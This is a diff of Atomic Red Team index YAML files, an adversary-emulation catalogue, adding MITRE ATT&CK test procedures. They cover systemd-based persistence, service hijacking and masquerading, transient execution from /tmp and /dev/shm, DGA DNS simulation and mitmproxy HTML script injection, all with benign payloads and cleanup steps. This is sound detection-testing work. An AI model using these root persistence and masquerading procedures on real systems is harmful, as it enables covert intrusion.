         \n\nMalware may be used to inject false credentials into the authentication
@@ -15182,6 +15184,7 @@ defense-evasion:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1027.006:
     technique:
@@ -28419,7 +28422,7 @@ execution:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-04-15T19:58:28.694Z'
-      name: Systemctl
+      name: 'System Services: Systemctl'
       description: "Adversaries may abuse systemctl to execute commands or programs.
         Systemctl is the primary interface for systemd, the Linux init system and
         service manager. Typically invoked from a shell, Systemctl can also be integrated
@@ -28442,7 +28445,586 @@ execution:
       - Linux
       x_mitre_version: '1.0'
       x_mitre_remote_support: false
-    atomic_tests: []
+      identifier: T1569.003
+    atomic_tests:
+    - name: Create and Enable a Malicious systemd Service Unit
+      auto_generated_guid: e58c8723-5503-4533-b642-535cd20ec648
+      description: |
+        Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
+        systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
+        to establish persistence or execute arbitrary commands under the context of systemd.
+
+        This simulates the full attacker workflow: writing the unit file, reloading the systemd
+        daemon, enabling the service to survive reboots, and starting it immediately. This is
+        consistent with techniques observed in ransomware precursor activity and post-exploitation
+        frameworks targeting Linux infrastructure.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_name:
+          description: Name of the malicious service to create
+          type: string
+          default: atomic-test
+        command_to_run:
+          description: Command the service will execute
+          type: string
+          default: /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable.
+          Ensure systemd is installed."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+          echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
+          echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+          echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
+          echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          systemctl enable #{service_name}.service
+          systemctl start #{service_name}.service
+          systemctl status #{service_name}.service
+        cleanup_command: |
+          systemctl stop #{service_name}.service 2>/dev/null || true
+          systemctl disable #{service_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          rm -f /tmp/atomic_service_output.txt
+    - name: Create systemd Service Unit from /tmp (Unusual Location)
+      auto_generated_guid: a1fa406e-2354-4a24-b6d6-94157e7564d4
+      description: |
+        Creates a systemd service unit file in /tmp and loads it using systemctl start with
+        an absolute path. Adversaries may write service unit files to world-writable directories
+        such as /tmp to avoid triggering alerts on new file creation in standard service
+        directories, or to execute payloads transiently without permanently installing a service.
+
+        Loading a service unit from an arbitrary path rather than a standard systemd directory
+        is unusual behaviour that should be detectable by monitoring systemctl command arguments.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_path:
+          description: Full path to the service file to be written in /tmp
+          type: path
+          default: "/tmp/atomic_tmp.service"
+        command_to_run:
+          description: Command the service will execute
+          type: string
+          default: /bin/bash -c "id > /tmp/atomic_tmp_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: "/tmp must exist and be writable\n"
+        prereq_command: 'if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "/tmp does not exist or is not writable on this
+          system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > #{service_path}
+          echo "Description=Atomic Tmp Service" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Service]" >> #{service_path}
+          echo "ExecStart=#{command_to_run}" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Install]" >> #{service_path}
+          echo "WantedBy=multi-user.target" >> #{service_path}
+          systemctl link #{service_path}
+          systemctl start $(basename #{service_path})
+          systemctl status $(basename #{service_path})
+        cleanup_command: |
+          systemctl stop $(basename #{service_path}) 2>/dev/null || true
+          rm -f #{service_path}
+          rm -f /tmp/atomic_tmp_output.txt
+    - name: Create systemd Service Unit from /dev/shm (Unusual Location)
+      auto_generated_guid: dce49381-a26b-4d95-bdfa-c607ffe8bee5
+      description: |
+        Creates a systemd service unit file in /dev/shm and loads it using systemctl.
+        /dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
+        and does not persist across reboots, making it particularly attractive to adversaries
+        seeking to execute transient payloads while evading file-based forensic detection.
+
+        This technique has been observed in post-exploitation scenarios where attackers
+        deliberately avoid writing to disk-backed locations to limit forensic artefacts.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_path:
+          description: Full path to the service file to be written in /dev/shm
+          type: path
+          default: "/dev/shm/atomic_shm.service"
+        command_to_run:
+          description: Command the service will execute
+          type: string
+          default: /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: "/dev/shm must exist and be writable\n"
+        prereq_command: 'if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else
+          exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/dev/shm does not exist or is not writable on this
+          system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > #{service_path}
+          echo "Description=Atomic SHM Service" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Service]" >> #{service_path}
+          echo "ExecStart=#{command_to_run}" >> #{service_path}
+          echo "" >> #{service_path}
+          echo "[Install]" >> #{service_path}
+          echo "WantedBy=multi-user.target" >> #{service_path}
+          systemctl link #{service_path}
+          systemctl start $(basename #{service_path})
+          systemctl status $(basename #{service_path})
+        cleanup_command: |
+          systemctl stop $(basename #{service_path}) 2>/dev/null || true
+          rm -f #{service_path}
+          rm -f /tmp/atomic_shm_output.txt
+    - name: Modify Existing systemd Service to Execute Malicious Command
+      auto_generated_guid: 6123928f-6389-4914-8d25-a5d69bd657fa
+      description: |
+        Creates a service unit file that initially runs a benign command, then modifies the
+        ExecStart directive using sed to substitute a malicious command before reloading and
+        restarting the service. Adversaries may hijack existing services to blend in with normal
+        service activity and avoid triggering detections focused solely on new service creation.
+
+        This technique reflects the tradecraft observed in more sophisticated intrusions where
+        blending into existing process trees is a priority over creating net-new services.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_name:
+          description: Name of the service to create and then modify for the test
+          type: string
+          default: atomic-modify-test
+        malicious_command:
+          description: Malicious command to substitute into ExecStart
+          type: string
+          default: /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'sed must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v sed)" ]; then exit 0; else exit 1;
+          fi
+
+          '
+        get_prereq_command: 'apt-get install -y sed 2>/dev/null || yum install -y
+          sed 2>/dev/null || echo "Could not install sed automatically."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+          echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+          echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          systemctl start #{service_name}.service
+          systemctl status #{service_name}.service
+        cleanup_command: |
+          systemctl stop #{service_name}.service 2>/dev/null || true
+          systemctl disable #{service_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          rm -f /tmp/atomic_hijack_output.txt
+    - name: Execute Command via Transient systemd Service (systemd-run)
+      auto_generated_guid: a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236
+      description: |
+        Uses systemd-run to execute a command as a transient systemd service without creating
+        a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
+        commands under the context of systemd while bypassing controls that monitor for new
+        unit file creation, since transient services exist only in memory for their lifetime.
+
+        This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
+        the service disappears from systemctl list-units once execution completes.
+      supported_platforms:
+      - linux
+      input_arguments:
+        unit_name:
+          description: Name of the transient systemd unit to create
+          type: string
+          default: atomic-transient
+        command_to_run:
+          description: Command to execute as a transient service
+          type: string
+          default: /bin/bash -c "id > /tmp/atomic_transient_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemd-run must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
+          exit 1; fi
+
+          '
+        get_prereq_command: 'echo "systemd-run is not available. Ensure systemd is
+          installed and up to date."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          systemd-run --unit=#{unit_name} --wait #{command_to_run}
+          systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
+        cleanup_command: |
+          systemctl stop #{unit_name}.service 2>/dev/null || true
+          rm -f /tmp/atomic_transient_output.txt
+    - name: Enumerate All systemd Services Using systemctl
+      auto_generated_guid: 1e5be8d4-605a-4acb-8709-2f80b2d8ea95
+      description: |
+        Enumerates all systemd services and their current states using systemctl list-units
+        and systemctl list-unit-files. Adversaries may enumerate running and enabled services
+        to identify targets for hijacking, understand the host environment, map installed
+        security tooling, or identify gaps in monitoring coverage.
+
+        Service enumeration is a common reconnaissance step during post-exploitation and may
+        precede service hijacking or masquerading activity. This test does not require
+        elevation as service listing is available to unprivileged users on most Linux systems.
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          systemctl list-units --type=service --all
+          systemctl list-unit-files --type=service
+        cleanup_command: 'echo "No cleanup required"
+
+          '
+    - name: Enable systemd Service for Persistence with Auto-Restart
+      auto_generated_guid: 2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7
+      description: |
+        Creates a payload script and a systemd service unit that executes it, then enables
+        the service to survive reboots using systemctl enable. The service is configured with
+        Restart=always to automatically restart on failure, mimicking the persistence mechanism
+        used by adversaries deploying backdoors or beacons on Linux hosts.
+
+        This technique is consistent with observed post-exploitation tradecraft where adversaries
+        establish a foothold that survives reboots and self-heals after interruption, complicating
+        incident response and remediation efforts.
+      supported_platforms:
+      - linux
+      input_arguments:
+        service_name:
+          description: Name of the persistence service to create
+          type: string
+          default: atomic-persist
+        payload_path:
+          description: Path to the payload script that the service will execute
+          type: path
+          default: "/tmp/atomic_payload.sh"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
+
+          '
+      - description: 'Payload script must exist at the specified path
+
+          '
+        prereq_command: 'if [ -f "#{payload_path}" ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: |
+          echo '#!/bin/bash' > #{payload_path}
+          echo 'echo persistent >> /tmp/atomic_persist_output.txt' >> #{payload_path}
+          chmod +x #{payload_path}
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+          echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
+          echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+          echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
+          echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
+          echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
+          echo "" >> /etc/systemd/system/#{service_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+          systemctl daemon-reload
+          systemctl enable #{service_name}.service
+          systemctl start #{service_name}.service
+          systemctl status #{service_name}.service
+        cleanup_command: |
+          systemctl stop #{service_name}.service 2>/dev/null || true
+          systemctl disable #{service_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{service_name}.service
+          rm -f /etc/systemd/system/multi-user.target.wants/#{service_name}.service
+          systemctl daemon-reload
+          rm -f #{payload_path}
+          rm -f /tmp/atomic_persist_output.txt
+    - name: Masquerade Malicious Service as Legitimate System Service
+      auto_generated_guid: 6fec8560-ff64-4bbf-bc79-734fea48f7ca
+      description: |
+        Creates a systemd service with a name and description closely resembling a legitimate
+        system service to blend in with normal service activity. Adversaries may deliberately
+        choose service names similar to well-known system services such as systemd-networkd,
+        cron, or ssh to evade detection from analysts reviewing service lists or automated
+        alerting on service names.
+
+        This masquerading technique is particularly effective in environments where detection
+        relies on service name allowlists or manual review of systemctl list-units output
+        rather than behavioural analysis of service unit file contents and ExecStart paths.
+      supported_platforms:
+      - linux
+      input_arguments:
+        masquerade_name:
+          description: Service name designed to closely mimic a legitimate system
+            service
+          type: string
+          default: systemd-network-helper
+        command_to_run:
+          description: Command the masquerading service will execute
+          type: string
+          default: /bin/bash -c "echo masquerade > /tmp/atomic_masquerade_output.txt"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'systemctl must be available on the system
+
+          '
+        prereq_command: 'if [ -x "$(command -v systemctl)" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: 'echo "systemctl is not available. Ensure systemd is running
+          on this system."
+
+          '
+      - description: 'The test must be run as root or with sudo privileges
+
+          '
+        prereq_command: 'if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "This test requires root privileges. Run as root
+          or use sudo."
+
+          '
+      - description: "/etc/systemd/system/ directory must exist and be writable\n"
+        prereq_command: 'if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system"
+          ]; then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "/etc/systemd/system/ does not exist or is not writable."
+
+          '
+      - description: 'Chosen masquerade service name must not already exist as a real
+          service
+
+          '
+        prereq_command: 'if ! systemctl list-unit-files --type=service | grep -q "^#{masquerade_name}.service";
+          then exit 0; else exit 1; fi
+
+          '
+        get_prereq_command: 'echo "A service named #{masquerade_name} already exists.
+          Change the masquerade_name input argument to avoid conflicts."
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          echo "[Unit]" > /etc/systemd/system/#{masquerade_name}.service
+          echo "Description=Network connectivity helper service" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "After=network.target" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "Before=network-online.target" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "[Service]" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "Restart=on-failure" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "RestartSec=5" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "[Install]" >> /etc/systemd/system/#{masquerade_name}.service
+          echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{masquerade_name}.service
+          systemctl daemon-reload
+          systemctl start #{masquerade_name}.service
+          systemctl status #{masquerade_name}.service
+        cleanup_command: |
+          systemctl stop #{masquerade_name}.service 2>/dev/null || true
+          systemctl disable #{masquerade_name}.service 2>/dev/null || true
+          rm -f /etc/systemd/system/#{masquerade_name}.service
+          systemctl daemon-reload
+          rm -f /tmp/atomic_masquerade_output.txt
   T1059.009:
     technique:
       type: attack-pattern
@@ -33659,7 +34241,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:41.026Z'
-      name: Outlook Rules
+      name: 'Office Application Startup: Outlook Rules'
       description: |-
         Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
 
@@ -33680,6 +34262,7 @@ persistence:
       - Windows
       - Office Suite
       x_mitre_version: '1.2'
+      identifier: T1137.005
     atomic_tests: []
   T1098.007:
     technique:
@@ -39308,7 +39891,7 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -39338,6 +39921,7 @@ persistence:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -41516,7 +42100,7 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:48:25.458Z'
-      name: Domain Generation Algorithms
+      name: 'Dynamic Resolution: Domain Generation Algorithms'
       description: |-
         Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
 
@@ -41543,7 +42127,45 @@ command-and-control:
       - Windows
       - ESXi
       x_mitre_version: '1.2'
-    atomic_tests: []
+      identifier: T1568.002
+    atomic_tests:
+    - name: DGA Simulation (Python)
+      auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
+      description: "Simulates Domain Generation Algorithm (DGA) traffic by generating
+        pseudo-random domains based on the current date and querying them using dig.
+        \nThis is designed to trigger DNS analytics and NGIDS.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        python_script_path:
+          description: Full path to the DGA python script
+          type: string
+          default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
+      dependency_executor_name: bash
+      dependencies:
+      - description: "#{python_script_path} must exist on system.\n"
+        prereq_command: 'if [ -f "#{python_script_path}" ]; then exit 0; else exit
+          1; fi
+
+          '
+        get_prereq_command: |
+          mkdir -p "$(dirname "#{python_script_path}")"
+          curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
+      - description: 'Python 3 must be installed to run the script.
+
+          '
+        prereq_command: 'which python3
+
+          '
+        get_prereq_command: 'sudo apt-get update && sudo apt-get install -y python3
+
+          '
+      executor:
+        command: 'python3 "#{python_script_path}"
+
+          '
+        name: bash
+        elevation_required: false
   T1071.004:
     technique:
       type: attack-pattern
@@ -41944,7 +42566,68 @@ command-and-control:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection
+      auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+      description: Start mitmdump and verify injected header and HTML content.
+      supported_platforms:
+      - macos
+      - linux
+      dependencies:
+      - description: python3 must be installed
+        prereq_command: 'command -v python3
+
+          '
+        get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
+          apt-get install -y python3) || sudo yum install -y python3
+
+          '
+      - description: curl must be installed
+        prereq_command: 'command -v curl
+
+          '
+        get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
+          install -y curl) || sudo yum install -y curl
+
+          '
+      - description: pipx must be installed
+        prereq_command: 'pipx --version
+
+          '
+        get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
+          install -y pipx) || sudo yum install -y pipx
+
+          '
+      - description: mitmproxy must be installed
+        prereq_command: 'pipx list | grep mitmproxy
+
+          '
+        get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'lsof -i tcp:8080 | grep mitmdump
+
+          '
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+      executor:
+        name: bash
+        command: |
+          curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+          grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+          curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+          grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+        cleanup_command: |
+          rm -rf /tmp/atomic_t1659_inject.py
+          rm -rf /tmp/atomic_t1659.log
+          rm -rf /tmp/curl_out.txt
+          rm -rf /tmp/atomic_t1659_page.html
+          pkill -f mitmdump || true
   T1205:
     technique:
       type: attack-pattern
@@ -54840,7 +55523,7 @@ credential-access:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       modified: '2025-10-24T17:49:27.324Z'
-      name: Domain Controller Authentication
+      name: 'Modify Authentication Process: Domain Controller Authentication'
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
         \n\nMalware may be used to inject false credentials into the authentication
@@ -54870,6 +55553,7 @@ credential-access:
       x_mitre_platforms:
       - Windows
       x_mitre_version: '2.1'
+      identifier: T1556.001
     atomic_tests: []
   T1556.005:
     technique:
@@ -68832,7 +69516,68 @@ initial-access:
       - macOS
       - Windows
       x_mitre_version: '1.0'
-    atomic_tests: []
+      identifier: T1659
+    atomic_tests:
+    - name: MITM Proxy Injection
+      auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
+      description: Start mitmdump and verify injected header and HTML content.
+      supported_platforms:
+      - macos
+      - linux
+      dependencies:
+      - description: python3 must be installed
+        prereq_command: 'command -v python3
+
+          '
+        get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
+          apt-get install -y python3) || sudo yum install -y python3
+
+          '
+      - description: curl must be installed
+        prereq_command: 'command -v curl
+
+          '
+        get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
+          install -y curl) || sudo yum install -y curl
+
+          '
+      - description: pipx must be installed
+        prereq_command: 'pipx --version
+
+          '
+        get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
+          install -y pipx) || sudo yum install -y pipx
+
+          '
+      - description: mitmproxy must be installed
+        prereq_command: 'pipx list | grep mitmproxy
+
+          '
+        get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
+
+          '
+      - description: mitmdump must be running on port 8080
+        prereq_command: 'lsof -i tcp:8080 | grep mitmdump
+
+          '
+        get_prereq_command: |
+          printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
+          ($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
+          sleep 5
+          lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
+      executor:
+        name: bash
+        command: |
+          curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
+          grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
+          curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
+          grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
+        cleanup_command: |
+          rm -rf /tmp/atomic_t1659_inject.py
+          rm -rf /tmp/atomic_t1659.log
+          rm -rf /tmp/curl_out.txt
+          rm -rf /tmp/atomic_t1659_page.html
+          pkill -f mitmdump || true
   T1078.001:
     technique:
       type: attack-pattern

atomics/Indexes/macos-index.yaml

@@ -1329,8 +1329,9 @@ defense-evasion:
           $bytes = [System.Convert]::FromBase64String($encodedString)
           $decodedString = [System.Text.Encoding]::UTF8.GetString($bytes)
           #write the decoded eicar string to file
-          $decodedString | Out-File T1027.013_decodedEicar.txt
-        cleanup_command: Just delete the resulting T1027.013_decodedEicar.txt file.
+          $decodedString | Out-File $env:temp\T1027.013_decodedEicar.txt
+        cleanup_command: Remove-Item $env:temp\T1027.013_decodedEicar.txt -Force -ErrorAction
+          Ignore
         name: powershell
         elevation_required: false
     - name: Decrypt Eicar File and Write to File
@@ -1348,8 +1349,9 @@ defense-evasion:
           $decrypt = ConvertTo-SecureString -String $encryptedString -Key $key
           $decryptedString = [Runtime.InteropServices.Marshal]::PtrToStringBSTR([Runtime.InteropServices.Marshal]::SecureStringToBSTR($decrypt))
